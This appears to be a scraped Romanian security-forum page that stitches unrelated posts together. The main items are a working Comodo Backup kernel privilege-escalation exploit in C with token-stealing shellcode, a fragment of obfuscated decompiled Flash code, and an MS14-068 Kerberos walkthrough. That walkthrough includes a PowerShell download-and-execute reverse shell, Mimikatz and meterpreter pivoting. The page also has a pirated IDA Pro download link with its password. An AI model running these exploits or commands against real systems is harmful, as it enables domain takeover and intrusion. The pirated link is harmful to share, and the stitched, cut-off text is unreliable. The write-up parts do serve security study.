(((_local3[_local5] & 0xFF) + _local6) & 0xFF); _local10 = _local3[_local5]; _local3[_local5] = _local3[_local6]; _local3[_local6] = _local10; _local9 = (((_local3[_local5] & 0xFF) + (_local3[_local6] & 0xFF)) & 0xFF); _local1[_local4] = (_local1[_local4] ^ _local3[_local9]); _local4++; //unresolved jump }; return (_local1); } private static function wigr(_arg1:String){ var _local2:* = new jtyk.ejtey.vree(); var _local3 = new Array(4); var _local4 = new Array(3); var _local5:uint = 0; if ((_local5 < _arg1.length)){ var _local6:uint = 0; if ((((_local6 < 4)) && (((_local5 + _local6) < _arg1.length)))){ _local3[_local6] = jtyk.ejtey.eruuf.indexOf(_arg1.charAt((_local5 + _local6))); while ((((_local3[_local6] < 0)) && ((_local5 < _arg1.length)))) { _local5++; _local3[_local6] = jtyk.ejtey.eruuf.indexOf(_arg1.charAt((_local5 + _local6))); }; _local6++; //unresolved jump }; _local4[0] = ((_local3[0] << 2) + ((_local3[1] & 48) >> 4)); _local4[1] = (((_local3[1] & 15) << 4) + ((_local3[2] & 60) >> 2)); _local4[2] = (((_local3[2] & 3) << 6) + _local3[3]); var _local9:uint = 0; if ((_local9 < _local4[jtyk.ejtey.weruji])){ if ((_local3[(_local9 + 1)] == 64)){ } else { _local2[jtyk.ejtey.wxwrtu](_local4[_local9]); _local9++; //unresolved jump }; }; _local5 = (_local5 + 4); //unresolved jump }; _local2[jtyk.ejtey.fhrw] = 0; return (_local2); [LIST=1] [*] } [/LIST] jtyk.ejtey = new (jtyk)(); } }//package[COLOR=#333333][FONT=segoe ui][B] Sursa: http://pastebin.com/nVKV8Ess

Invata C#.

@Zatarra se ocupa de chatu vietii, mie mi se rupe de el.

[h=1]Comodo Backup 4.4.0.0 - NULL Pointer Dereference EOP[/h] /* Exploit Title - Comodo Backup Null Pointer Dereference Privilege Escalation Date - 23rd January 2015 Discovered by - Parvez Anwar (@parvezghh) Vendor Homepage - https://www.comodo.com Tested Version - 4.4.0.0 Driver Version - 1.0.0.957 - bdisk.sys Tested on OS - 32bit Windows XP SP3 and Windows 7 SP1 OSVDB - http://www.osvdb.org/show/osvdb/112828 CVE ID - CVE-2014-9633 Vendor fix url - http://forums.comodo.com/news-announcements-feedback-cb/comodo-backup-44123-released-t107293.0.html Fixed version - 4.4.1.23 Fixed Driver Ver - 1.0.0.972 Note ---- Does not cleanly exit, had to use some leave instructions to get the command prompt. If you know of a better way please do let me know. Below in from Windows XP in IofCallDriver function. eax = 12h 804e37fe 8b7108 mov esi,dword ptr [ecx+8] <- control the null page as ecx = 00000000 804e3801 52 push edx 804e3802 51 push ecx 804e3803 ff548638 call dword ptr [esi+eax*4+38h] ds:0023:00000080=00000090 804e3807 5e pop esi 804e3808 c3 ret esi + eax*4 + 38h = 0 + 48 + 38 = 80h if ESI is null */ #include <stdio.h> #include <windows.h> #define BUFSIZE 4096 typedef NTSTATUS (WINAPI *_NtAllocateVirtualMemory)( IN HANDLE ProcessHandle, IN OUT PVOID *BaseAddress, IN ULONG ZeroBits, IN OUT PULONG RegionSize, IN ULONG AllocationType, IN ULONG Protect); // Windows XP SP3 #define XP_KPROCESS 0x44 // Offset to _KPROCESS from a _ETHREAD struct #define XP_TOKEN 0xc8 // Offset to TOKEN from the _EPROCESS struct #define XP_UPID 0x84 // Offset to UniqueProcessId FROM the _EPROCESS struct #define XP_APLINKS 0x88 // Offset to ActiveProcessLinks _EPROCESS struct // Windows 7 SP1 #define W7_KPROCESS 0x50 // Offset to _KPROCESS from a _ETHREAD struct #define W7_TOKEN 0xf8 // Offset to TOKEN from the _EPROCESS struct #define W7_UPID 0xb4 // Offset to UniqueProcessId FROM the _EPROCESS struct #define W7_APLINKS 0xb8 // Offset to ActiveProcessLinks _EPROCESS struct BYTE token_steal_xp[] = { 0x52, // push edx Save edx on the stack 0x53, // push ebx Save ebx on the stack 0x33,0xc0, // xor eax, eax eax = 0 0x64,0x8b,0x80,0x24,0x01,0x00,0x00, // mov eax, fs:[eax+124h] Retrieve ETHREAD 0x8b,0x40,XP_KPROCESS, // mov eax, [eax+XP_KPROCESS] Retrieve _KPROCESS 0x8b,0xc8, // mov ecx, eax 0x8b,0x98,XP_TOKEN,0x00,0x00,0x00, // mov ebx, [eax+XP_TOKEN] Retrieves TOKEN 0x8b,0x80,XP_APLINKS,0x00,0x00,0x00, // mov eax, [eax+XP_APLINKS] <-| Retrieve FLINK from ActiveProcessLinks 0x81,0xe8,XP_APLINKS,0x00,0x00,0x00, // sub eax, XP_APLINKS | Retrieve _EPROCESS Pointer from the ActiveProcessLinks 0x81,0xb8,XP_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00, // cmp [eax+XP_UPID], 4 | Compares UniqueProcessId with 4 (System Process) 0x75,0xe8, // jne ---- 0x8b,0x90,XP_TOKEN,0x00,0x00,0x00, // mov edx, [eax+XP_TOKEN] Retrieves TOKEN and stores on EDX 0x8b,0xc1, // mov eax, ecx Retrieves KPROCESS stored on ECX 0x89,0x90,XP_TOKEN,0x00,0x00,0x00, // mov [eax+XP_TOKEN], edx Overwrites the TOKEN for the current KPROCESS 0x5b, // pop ebx Restores ebx 0x5a, // pop edx Restores edx 0xc9, // leave 0xc9, // leave 0xc9, // leave 0xc9, // leave 0xc3 // ret }; BYTE token_steal_w7[] = { 0x52, // push edx Save edx on the stack 0x53, // push ebx Save ebx on the stack 0x33,0xc0, // xor eax, eax eax = 0 0x64,0x8b,0x80,0x24,0x01,0x00,0x00, // mov eax, fs:[eax+124h] Retrieve ETHREAD 0x8b,0x40,W7_KPROCESS, // mov eax, [eax+W7_KPROCESS] Retrieve _KPROCESS 0x8b,0xc8, // mov ecx, eax 0x8b,0x98,W7_TOKEN,0x00,0x00,0x00, // mov ebx, [eax+W7_TOKEN] Retrieves TOKEN 0x8b,0x80,W7_APLINKS,0x00,0x00,0x00, // mov eax, [eax+W7_APLINKS] <-| Retrieve FLINK from ActiveProcessLinks 0x81,0xe8,W7_APLINKS,0x00,0x00,0x00, // sub eax, W7_APLINKS | Retrieve _EPROCESS Pointer from the ActiveProcessLinks 0x81,0xb8,W7_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00, // cmp [eax+W7_UPID], 4 | Compares UniqueProcessId with 4 (System Process) 0x75,0xe8, // jne ---- 0x8b,0x90,W7_TOKEN,0x00,0x00,0x00, // mov edx, [eax+W7_TOKEN] Retrieves TOKEN and stores on EDX 0x8b,0xc1, // mov eax, ecx Retrieves KPROCESS stored on ECX 0x89,0x90,W7_TOKEN,0x00,0x00,0x00, // mov [eax+W7_TOKEN], edx Overwrites the TOKEN for the current KPROCESS 0x5b, // pop ebx Restores ebx 0x5a, // pop edx Restores edx 0xc9, // leave 0xc9, // leave 0xc9, // leave 0xc9, // leave 0xc3 // ret }; BYTE ESInull[] = "\x00\x00\x00\x00"; BYTE RETaddr[] = "\x90\x00\x00\x00"; int GetWindowsVersion() { int v = 0; DWORD version = 0, minVersion = 0, majVersion = 0; version = GetVersion(); minVersion = (DWORD)(HIBYTE(LOWORD(version))); majVersion = (DWORD)(LOBYTE(LOWORD(version))); if (minVersion == 1 && majVersion == 5) v = 1; // "Windows XP; if (minVersion == 1 && majVersion == 6) v = 2; // "Windows 7"; return v; } void spawnShell() { STARTUPINFOA si; PROCESS_INFORMATION pi; ZeroMemory(?, sizeof(pi)); ZeroMemory(&si, sizeof(si)); si.cb = sizeof(si); si.cb = sizeof(si); si.dwFlags = STARTF_USESHOWWINDOW; si.wShowWindow = SW_SHOWNORMAL; if (!CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, CREATE_NEW_CONSOLE, NULL, NULL, &si, ?)) { printf("\n[-] CreateProcess failed (%d)\n\n", GetLastError()); return; } CloseHandle(pi.hThread); CloseHandle(pi.hProcess); } int main(int argc, char *argv[]) { _NtAllocateVirtualMemory NtAllocateVirtualMemory; NTSTATUS allocstatus; LPVOID base_addr = (LPVOID)0x00000001; DWORD written; int rwresult; int size = BUFSIZE; HANDLE hDevice; unsigned char buffer[BUFSIZE]; unsigned char devhandle[MAX_PATH]; printf("-------------------------------------------------------------------------------\n"); printf(" COMODO Backup (bdisk.sys) Null Pointer Dereference EoP Exploit \n"); printf(" Tested on Windows XP SP3/Windows 7 SP1 (32bit) \n"); printf("-------------------------------------------------------------------------------\n\n"); sprintf(devhandle, "\\\\.\\%s", "bdisk"); NtAllocateVirtualMemory = (_NtAllocateVirtualMemory)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtAllocateVirtualMemory"); if (!NtAllocateVirtualMemory) { printf("[-] Unable to resolve NtAllocateVirtualMemory\n"); return -1; } printf("[+] NtAllocateVirtualMemory [0x%p]\n", NtAllocateVirtualMemory); printf("[+] Allocating memory at [0x%p]\n", base_addr); allocstatus = NtAllocateVirtualMemory(INVALID_HANDLE_VALUE, &base_addr, 0, &size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); if (allocstatus) { printf("[-] An error occured while mapping executable memory. Status = 0x%08x\n", allocstatus); printf("Error : %d\n", GetLastError()); return -1; } printf("[+] NtAllocateVirtualMemory successful\n"); memset(buffer, 0x90, BUFSIZE); memcpy(buffer+0x00000007, ESInull, sizeof(ESInull)-1); memcpy(buffer+0x0000007f, RETaddr, sizeof(RETaddr)-1); if (GetWindowsVersion() == 1) { printf("[i] Running Windows XP\n"); memcpy(buffer+0x00000100, token_steal_xp, sizeof(token_steal_xp)); printf("[i] Size of shellcode %d bytes\n", sizeof(token_steal_xp)); } else if (GetWindowsVersion() == 2) { printf("[i] Running Windows 7\n"); memcpy(buffer+0x00000100, token_steal_w7, sizeof(token_steal_w7)); printf("[i] Size of shellcode %d bytes\n", sizeof(token_steal_w7)); } else if (GetWindowsVersion() == 0) { printf("[i] Exploit not supported on this OS\n\n"); return -1; } rwresult = WriteProcessMemory(INVALID_HANDLE_VALUE, (LPVOID)0x00000001, buffer, BUFSIZE, &written); if (rwresult == 0) { printf("[-] An error occured while mapping writing memory: %d\n", GetLastError()); return -1; } printf("[+] WriteProcessMemory %d bytes written\n", written); printf("[~] Press any key to Exploit . . .\n"); getch(); hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL); if (hDevice == INVALID_HANDLE_VALUE) { printf("[-] CreateFile open %s device failed (%d)\n\n", devhandle, GetLastError()); return -1; } else { printf("[+] Open %s device successful\n", devhandle); } CloseHandle(hDevice); printf("[+] Spawning SYSTEM Shell\n"); spawnShell(); return 0; } Sursa: http://www.exploit-db.com/exploits/35905/

How to intercept traffic from Java applications December 19, 2014 Ionut Popescu During a security assessment you may need to monitor the traffic from a Java application and also to modify it. What can you do? What if the application uses SSL/TLS and even SSL pinning? We found a very useful tool which helped us in this type of situations. JavaSnoop JavaSnoop is a tool developed by Aspect Security with the purpose of helping people to intercept Java function calls (e.g. toString) from Java applications. It allows you to attach to a process and intercept any Java function call, view and modify the parameter values, print the stacktrace or save all function calls to a file.JavaSnoop allows browsing all Java classes and all functions used by the target application. What you have to do is to choose the right function from the right class to hook in order to intercept the function call and parameters. For example, you may consider functions that send, receive, hash or encrypt data in order to intercept and modify sensitive data. Sursa: How to intercept traffic from Java applications – Security Café

[h=1]Bruce Schneier and Edward Snowden[/h] Bruce Schneier, Harvard Berkman Center Fellow, talks with Edward Snowden about government surveillance and the effectiveness of privacy tools like encryption to an audience at Harvard's School of Engineering and Applied Sciences. This conversation kicks off the annual symposium on the future of computation in science and engineering hosted by the IACS- Harvard's Institute for Applied Computational Science.

Windows 7 or 8 to Windows 10 using Windows Update By Martin Brinkmann on January 25, 2015 in Windows - Last Update: January 25, 2015 8 The only options you had previously to upgrade from an older copy of Windows to a new one was to run the installer either while the installed operating system was running or by booting from an installation disc or Flash drive to initiate it. Microsoft wants to make things more comfortable and has added an option to upgrade to Windows 10 using Windows Update. Windows Update is the operating system's updating service which is best known for delivering security patches once a month to supported Windows devices. The core benefit of upgrading via Windows Update is convenience. You don't need to download the ISO image of Windows 10, don't need to burn it to DVD or copy it to a USB Flash Drive, and don't need to run it afterwards on your system. Note: Windows 10 is not ready for prime time yet and it is not suggested to upgrade your work system to it. It is ideal if you have a spare system and want to try it out or a full backup that you can restore. The upgrade process The first thing you need to do is downloaded a small program from Microsoft which prepares your Windows 7 or Windows 8 operating system for the upgrade. It is a 10 Megabyte file that runs automatically on your computer after you execute it. It requires a restart of the PC so that the changes it made take effect. The device will boot into the current operating system after restart. Open Windows Update on the PC now. You can tap on the Windows-key, type Windows Update and hit enter to do so. There you need to click on the check for updates button. It may take a while for the check to complete. In the end, the update to Windows 10 should be displayed which you can run with a click on the install button. As you can see on the screenshot above, the update has a size of 2.8 Gigabyte. The download may take a while depending on your Internet connection speed. The update installer runs the same upgrade process as the ISO installer. Important remarks It seems possible to go back to the old operating system after the update. While that is the case, it is highly suggested that you create a backup of your important files and data before you proceed with the update. If you are running a 32-bit version of Windows, you cannot upgrade to 64-bit versions of Windows 10. There is also no option to change the interface language during the upgrade process. You can remove the "update to Windows 10 preparation update" again from Windows. You find it in the installed updates list as "Update for Microsoft Windows (KB2990214)". Closing Words Windows 10 will be a free upgrade in the first year to all (home) customers who run Windows 7 or Windows 8.1 devices and it is likely that Microsoft will make Windows Update one of the delivery options for the update. Now You: What's your Windows 10 upgrade experience? Sursa: http://www.ghacks.net/2015/01/25/how-to-update-windows-7-or-8-to-windows-10-using-windows-update/

Install and when prompted, enter password: itJpyHidszaR Hex-Rays.IDA.Pro.v6.6.Incl.Hex-Rays.Decompiler-iND https://mega.co.nz/#!0dJT1LrK!4KzjVznWIVTCEY_7xpSRY8X_UdQynndqyalGoMis7vc Download links for ida6620150114204514.rar - Mirrorcreator - Upload files to multiple hosts Via TrojanForge: https://trojanforge.co/showthread.php/3172-Hex-Rays-IDA-Pro-6-6-Incl-Hex-Rays-Decompiler

Cred ca se poate in versiunea Premium/Pro care costa probabil vreo 50 de $.

Digging into MS14-068, Exploitation and Defence The security world has been abuzz lately after Microsoft released a critical security patch to fix a flaw in a core service provided by domain controllers. The vulnerability, known by the identifier MS14-068 (CVE-2014-6324), allows any authenticated domain user to escalate their privileges to domain administrator. As a result, an authenticated attacker is able to completely compromise the domain. Most concerning of all it was revealed that this issue was being exploited in the wild! This post will discuss the technical details of this vulnerability and provide a brief guide for exploiting this issue in a couple of common scenarios that may be encountered during a penetration test. Kerberos in a Windows Domain Kerberos enables users to authenticate to services via a trusted third party. This allows authentication to be centralised so that all the remote services in a network do not require access to user secrets for authentication purposes. The following steps provide a brief overview of the initial stages of the Kerberos protocol in a Windows domain: 1. AS-REQ The user authenticates with the trusted third party known as the Key Distribution Centre (KDC) — the domain controller in a Windows domain — by sending a message containing their identity and a timestamp encrypted with their password as proof of identity. 2. AS-REP If the user authenticated successfully then the KDC constructs a ticket granting ticket (TGT) that will be used by the client to request tickets for other services. The TGT is a service ticket for the Ticket Granting Service (TGS) which is also running on the KDC. Simplified example of a TGT A Kerberos ticket, such as a TGT, contains identifying information about a user and their roles. In a Windows domain this structure is known as the Privilege Attribute Certificate (PAC) which stores information that includes the account name, ID and group membership information. In order to protect the integrity of the PAC it is signed by the KDC using secret keys known only to the KDC and the target service. One signature uses the target service account’s key and the other uses a key known only by the KDC. This allows the KDC or the target service to verify that the PAC has not been tampered with after creation. Furthermore, the entire ticket is encrypted using the target service’s secret key. In the case of the TGT the account of the target service is the krbtgt account. Therefore, both signatures on the PAC are keyed with the krbtgt account’s key and the ticket is encrypted with that same key. The ticket also contains a session key for use in future communication with the TGS. The TGT is returned by the KDC in a message that also contains the TGS session key encrypted with the secret key of the user. 3. TGS-REQ The request for a service ticket from the TGS contains three major components: The name of the service that will be accessed The TGT which is encrypted with the krbtgt key An authenticator: the user ID and a timestamp encrypted with the TGS session key 4. TGS-REP The TGS can decrypt the presented TGT in order to recover the session key. This key is then used to decrypt the authenticator. The TGS is now able to verify that the ID contained in the authenticator matches the TGT, that the TGT has not expired, and the PAC has a valid signature. If the the information presented is acceptable then the information from the PAC in the TGT is copied into a new service ticket. The PAC in the new ticket is signed once using the key of the target service and then again with the krbtgt key. The ticket itself is encrypted using the key of the target service. The client can use the ticket returned by the TGS as a proof of identity with which to access the target service. MS14-068 Analysis On 18th November a critical security patch was released by Microsoft to fix an issue in the way the KDC validates the signature of the PAC. This vulnerability would allow a PAC to be forged that would be accepted by the KDC as legitimate. Since the PAC contains the groups that the user is a member of it would be possible to abuse the flaw to create a fake PAC claiming they are a member of the domain administrators group. The underlying issue was relatively simple. Instead of requiring one of the three signature types prescribed by the MS-PAC specification, the KDC service would accept any checksum type that is implemented in the low-level cryptographic library. The supported checksums included unkeyed algorithms such as plain MD5 or even CRC32. Therefore, it is possible to forge a PAC without knowledge of any secret keys by ‘signing’ it using CRC32. This issue was easy to verify by making a small modification to Mimikatz so that the PAC in a golden ticket is ‘signed’ using CRC32: diff --git a/mimikatz/modules/kerberos/kuhl_m_kerberos.c b/mimikatz/modules/kerberos/kuhl_m_kerberos.c index a262149..2478213 100644 --- a/mimikatz/modules/kerberos/kuhl_m_kerberos.c +++ b/mimikatz/modules/kerberos/kuhl_m_kerberos.c @@ -555,7 +555,9 @@ PDIRTY_ASN1_SEQUENCE_EASY kuhl_m_kerberos_golden_data(LPCWSTR username, LPCWSTR default: SignatureType = KERB_CHECKSUM_HMAC_MD5; } + SignatureType = KERB_CHECKSUM_CRC32; + if(kuhl_m_pac_validationInfo_to_PAC(&validationInfo, SignatureType, &pacType, &pacTypeSize)) { kprintf(L" * PAC generated\n"); The following screenshot shows the ‘signatures’ on the PAC in the TGT generated by the patched version of Mimikatz: CRC32 PAC Signature Although this test of MS14-068 is successful, Mimikatz still requires the krbtgt key in order to encrypt the TGT. We managed to create a forged PAC, but it doesn’t seem possible to put it into a TGT without knowledge of the target service’s secret key (i.e. the krbtgt account’s hash). If this key is available then the standard golden or silver ticket attacks apply, so MS14-068 is unnecessary. The observation made by Sylvain Monné, and neatly exploited in his proof of concept (PyKEK), is that the PAC does not necessarily need to be included in the encrypted ticket. Instead, a forged PAC can be placed in the enc-authorization-data segment of the TGS-REQ message. Although this field is encrypted, it is protected with a key known to the user. Either the TGT session key or a sub-session key (specified in the authenticator) can be used. The second trick is to request a valid TGT that does not contain a PAC by setting the PA-PAC-REQUEST parameter in the AS-REQ to false. This is done to ensure there are no conflicts between the legitimate PAC in the TGT and the forged PAC included elsewhere. So, in order to perform the exploit, only the ID and password of a standard domain user are required. These details are necessary to request a PAC-less TGT, recover the session key that is returned, and encrypt the authenticator in the TGS-REQ. The following image shows a simplified example of a TGS-REQ message to exploit MS14-068. A valid TGT is included, but it does not contain a PAC. Instead, a malicious PAC created by the user has been included in the enc-authorization-data field. This PAC claims that the user is a member of a number of privileged groups, including the domain administrators, and has been ‘signed’ using plain MD5. TGS-REQ containing a forged PAC to exploit MS14-068 The steps taken by PyKEK to exploit MS14-068 are as follows: Request a TGT without a PAC by sending an AS-REQ with PA-PAC-REQUEST set to false. Forge a PAC claiming membership of domain administrators. ‘Sign’ it using plain MD5. Create a TGS-REQ message with krbtgt as the target. The TGT from the first step is used along with the fake PAC encrypted with a sub-session key. Send this to a vulnerable domain controller. The KDC service will accept the forged PAC and return a new TGT which contains a PAC. This TGT can be injected into memory using Mimikatz to be used during the standard Kerberos authentication flow. Interestingly this entire issue is a repeat of CVE-2011-0043 (MS11-013), albeit in a different area of code. At that time the issue was identified as a “Kerberos Unkeyed Checksum Vulnerability” and due to “the Microsoft Kerberos implementation [supporting] a weak hashing mechanism, which can allow for certain aspects of a Kerberos service ticket to be forged”. Furthermore, this issue was reported by the MIT Kerberos team after the same vulnerability was fixed in their implementation in 2010 (CVE-2010-1324). Given that the issue was found to be being actively exploited prior to the patch being released it is possible that MS14-068 has been used by advanced attackers for a few years now. Practical Exploitation As well as the above mentioned Python Kerberos Exploitation Kit (PyKEK), there is a second toolkit which contains a function exploit: Golden PAC module in Impacket. At the time of writing, these attacks work against domain controllers running Windows 2008 (R2), and earlier, but not against Windows 2012. The only other requirement is a valid domain account username and password. Detecting Vulnerable Domain Controllers The only sure method for detecting a vulnerable system is to look at its patch level (or by attempting to exploit it). However, the Responder tool from SpiderLabs includes a script that will perform basic vulnerability detection by checking the uptime of the server to see if it has been rebooted since the patch was released. $ python FindSMB2UpTime.py 172.16.80.10 DC is up since: 2014-11-08 10:22:08 This DC is vulnerable to MS14-068 This check can yield false negatives as a domain controller may have been rebooted without the patch having been applied. For example, the following check shows an un-patched system that has been restarted: $ python FindSMB2UPTime.py 172.16.80.10 DC is up since: 2014-12-08 20:53:19 Internal Penetration Testing The first demonstration is against the target when you have normal network level access. This means you have your DNS server set to the domain’s DNS server (probably your target DC). It is important when working with Kerberos that your system clock is synced with the target host. Kerberos generally allows a 5 minute skew by default, but we can use tools to find the target’s time from an unauthenticated perspective. For example, the net command: $ net time -S 172.16.80.10 Wed Dec 10 11:05:09 2014 Or with the nmap smb-os-discovery script: | smb-os-discovery: | OS: Windows Server ® 2008 Standard 6002 Service Pack 2 (Windows Server ® 2008 Standard 6.0) | OS CPE: cpe:/o:microsoft:windows_server_2008::sp2 | Computer name: msfdc01 | NetBIOS computer name: MSFDC01 | Domain name: metasploitable.local | Forest name: metasploitable.local | FQDN: msfdc01.metasploitable.local |_ System time: 2014-12-10T11:02:33+00:00 After setting your local system time, we need to get the user’s SID. We can query this remotely with the net tool: $ net rpc -W METASPLOITABLE.LOCAL -U user01 -S 172.16.80.10 shell Enter user01's password: Talking to domain METASPLOITABLE (S-1-5-21-2928836948-3642677517-2073454066) net rpc> user net rpc user> show net rpc user> show user01 user rid: 1105, group rid: 513 We can combine the Domain SID with the user RID to get the target user’s SID: S-1-5-21-2928836948-3642677517-2073454066-1105. The next step is to generate our Kerberos ticket with PyKEK. We need to supply the following arguments: -u USERNAME@FQDN.DOMAIN.NAME (our username) -d TARGET.FDQN.DOMAIN.NAME (the domain controller) -p PASSWORD (our password) -s SID (our SID) The following command has generated a forged TGT for user01 and stored it in the TGT_user01@metasploitable.local.ccache file: $ python ms14-068.py -u user01@metasploitable.local -d msfdc01.metasploitable.local -p Password1 -s S-1-5-21-2928836948-3642677517-2073454066 -1105 [+] Building AS-REQ for msfdc01.metasploitable.local... Done! [+] Sending AS-REQ to msfdc01.metasploitable.local... Done! [+] Receiving AS-REP from msfdc01.metasploitable.local... Done! [+] Parsing AS-REP from msfdc01.metasploitable.local... Done! [+] Building TGS-REQ for msfdc01.metasploitable.local... Done! [+] Sending TGS-REQ to msfdc01.metasploitable.local... Done! [+] Receiving TGS-REP from msfdc01.metasploitable.local... Done! [+] Parsing TGS-REP from msfdc01.metasploitable.local... Done! [+] Creating ccache file 'TGT_user01@metasploitable.local.ccache'... Done! To use this ticket, which is in the Credential Cache (ccache) format, we need to move it to the /tmp directory where the Kerberos tools look for tickets: $ mv TGT_user01@metasploitable.local.ccache /tmp/krb5cc_0 We can then authenticate to the domain controller: $ smbclient -W METASPLOITABLE.LOCAL -k //msfdc01/c$ OS=[Windows Server ® 2008 Standard 6002 Service Pack 2] Server=[Windows Server ® 2008 Standard 6.0] smb: \> and even use winexe to execute commands: $ winexe -k METASPLOITABLE.LOCAL //msfdc01 whoami metasploitable.local\user01 In order to get a reverse shell, we can set up a Metasploit delivery mechanism such as Powershell Web Delivery: 20141210-11:29 - 192.168.153.133 exploit(web_delivery) > set TARGET 2 TARGET => 2 20141210-11:30 - 192.168.153.133 exploit(web_delivery) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp 20141210-11:30 - 192.168.153.133 exploit(web_delivery) > set LHOST 172.16.3.76 LHOST => 172.16.3.76 20141210-11:30 - 192.168.153.133 exploit(web_delivery) > set LPORT 8686 LPORT => 8686 20141210-11:30 - 192.168.153.133 exploit(web_delivery) > run [*] Exploit running as background job. [*] [2014.12.10-11:30:43] Started reverse handler on 172.16.3.76:8686 [*] [2014.12.10-11:30:43] Using URL: http://0.0.0.0:8080/moKqrqIYh0 [*] [2014.12.10-11:30:43] Local IP: http://192.168.153.133:8080/moKqrqIYh0 [*] [2014.12.10-11:30:43] Server started. [*] [2014.12.10-11:30:43] Run the following command on the target machine: powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://172.16.3.76:8080/moKqrqIYh0')) We then pass the powershell command line to winexe to run as a service: $ winexe -k METASPLOITABLE.LOCAL //msfdc01 "powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://172.16.3.76 :8080/moKqrqIYh0'))" The result is a reverse shell with administrative privileges on the domain controller. At this point we can create a permanent back-door on the domain to maintain access even if the vulnerability becomes patched in the future. [*] [2014.12.10-11:36:43] 172.16.80.10 web_delivery - Delivering Payload [*] [2014.12.10-11:36:43] Sending stage (770048 bytes) to 172.16.80.10 [*] Starting interaction with 1... meterpreter > getuid Server username: METASPLOITABLE.LOCAL\user01 meterpreter > sysinfo Computer : MSFDC01 OS : Windows 2008 (Build 6002, Service Pack 2). Architecture : x86 System Language : en_GB Meterpreter : x86/win32 meterpreter > getsystem ...got system (via technique 1). Alternatively with Impacket The Golden PAC module included in Impacket makes post exploitation easier by performing it automatically for you. Once a TGT containing a forged PAC has been created it is used to create an SMB connection to the domain controller and the PsExec technique is used to gain command execution: $ python goldenPac.py metasploitable.local/user01@msfdc01 Impacket v0.9.13-dev - Copyright 2002-2014 Core Security Technologies Password: [*] Requesting shares on msfdc01..... [*] Found writable share ADMIN$ [*] Uploading file zYAhIGAf.exe [*] Opening SVCManager on msfdc01..... [*] Creating service WzhF on msfdc01..... [*] Starting service WzhF..... [!] Press help for extra shell commands Microsoft Windows [Version 6.0.6002] Copyright © 2006 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami nt authority\system C:\Windows\system32>echo %COMPUTERNAME% MSFDC01 Exploiting Remotely The second scenario is exploiting a target user who we have compromised remotely, such as via a phishing attack. We assume that we have a shell on the user’s machine, and have recovered their password (e.g. by escalating to SYSTEM and using Mimikatz to dump it). [*] Meterpreter session 3 opened (172.16.3.76:8686 -> 172.16.80.100:49747) at 2014-12-10 11:55:10 +0000 sessions -i 3 [*] Starting interaction with 3... meterpreter > getuid Server username: METASPLOITABLE\user01 meterpreter > sysinfo Computer : MSFTS01 OS : Windows 8.1 (Build 9600). Architecture : x64 (Current Process is WOW64) System Language : en_GB Meterpreter : x86/win32 We need to be able to talk to the domain controller in order to use the exploit scripts. So, we add a port forward to meterpreter to pivot port 88 (kerberos) over our implant: meterpreter > portfwd add -l 88 -p 88 -r 172.16.80.10 [*] Local TCP relay created: 0.0.0.0:88 <-> 172.16.80.10:88 The FQDN for the target system should also point to localhost so that traffic is forwarded via meterpreter. This can be done with a simple addition to /etc/hosts: $ echo 127.0.0.1 msfdc01 >> /etc/hosts $ echo 127.0.0.1 msfdc01.metasploitable.local >> /etc/hosts The user’s SID can be discovered via the command line: meterpreter > shell Process 2808 created. Channel 5 created. Microsoft Windows [Version 6.3.9600] © 2013 Microsoft Corporation. All rights reserved. C:\Windows\system32\WindowsPowerShell\v1.0>whoami /user whoami /user USER INFORMATION ---------------- User Name SID ===================== ============================================== metasploitable\user01 S-1-5-21-2928836948-3642677517-2073454066-1105 We know have all the information required to use PyKEK to generate our privileged TGT: $ python ms14-068.py -u user01@metasploitable.local -d msfdc01.metasploitable.local -p Password1 -s S-1-5-21-2928836948-3642677517-2073454066 -1105 [+] Building AS-REQ for msfdc01.metasploitable.local... Done! [+] Sending AS-REQ to msfdc01.metasploitable.local... Done! [+] Receiving AS-REP from msfdc01.metasploitable.local... Done! [+] Parsing AS-REP from msfdc01.metasploitable.local... Done! [+] Building TGS-REQ for msfdc01.metasploitable.local... Done! [+] Sending TGS-REQ to msfdc01.metasploitable.local... Done! [+] Receiving TGS-REP from msfdc01.metasploitable.local... Done! [+] Parsing TGS-REP from msfdc01.metasploitable.local... Done! [+] Creating ccache file 'TGT_user01@metasploitable.local.ccache'... Done! Although Mimikatz can load our ccache file using the kerberos::ptc command, at present the Meterpreter Kiwi module only has support for .kirbi files. We can convert our ccache file to kirbi using Mimikatz as follows: $ wine mimikatz.exe "kerberos::clist TGT_user01@metasploitable.local.ccache /export" exit p11-kit: couldn't load module: /usr/lib/i386-linux-gnu/pkcs11/gnome-keyring-pkcs11.so: /usr/lib/i386-linux-gnu/pkcs11/gnome-keyring-pkcs11.so: cannot open shared object file: No such file or directory err:winediag:SECUR32_initNTLMSP ntlm_auth was not found or is outdated. Make sure that ntlm_auth >= 3.0.25 is in your path. Usually, you can find it in the winbind package of your distribution. fixme:msvcrt:MSVCRT__setmode fd (1) mode (0x00040000) unknown fixme:msvcrt:MSVCRT__setmode fd (2) mode (0x00040000) unknown .#####. mimikatz 2.0 alpha (x86) release "Kiwi en C" (Nov 20 2014 01:35:31) .## ^ ##. ## / \ ## /* * * ## \ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) '## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo) '#####' with 15 modules * * */ fixme:lsa:LsaConnectUntrusted 0x42ba8c stub fixme:lsa:LsaLookupAuthenticationPackage (nil) 0x42b67c 0x42ba84 stub fixme:wlanapi:WlanOpenHandle (1, (nil), 0x30fdf8, 0x42bac8) stub mimikatz(commandline) # kerberos::clist TGT_user01@metasploitable.local.ccache /export Principal : (01) : Z ; @ Z Data 0 Start/End/MaxRenew: 10/12/2014 12:00:26 ; 10/12/2014 22:00:25 ; 17/12/2014 12:00:25 Service Name (01) : Z ; Z ; @ Z Target Name (01) : Z ; Z ; @ Z Client Name (01) : Z ; @ Z Flags 50a00000 : pre_authent ; renewable ; proxiable ; 